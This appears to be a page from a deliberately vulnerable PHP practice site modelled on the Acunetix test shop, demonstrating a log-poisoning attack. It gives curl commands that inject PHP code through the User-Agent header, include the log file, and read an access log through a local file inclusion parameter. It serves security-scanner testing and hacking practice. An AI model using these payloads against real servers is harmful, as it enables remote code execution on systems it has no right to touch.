Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Log Injection / Log Poisoning Demo

Request logged.

Log Poisoning Attack

1. Inject PHP code into User-Agent header:

curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"

2. Then include the log file via LFI:

curl "http://localhost/logpoison.php?include=1"

Or use the LFI in showimage.php to read the log file:

showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log

Actions

Logs cleared.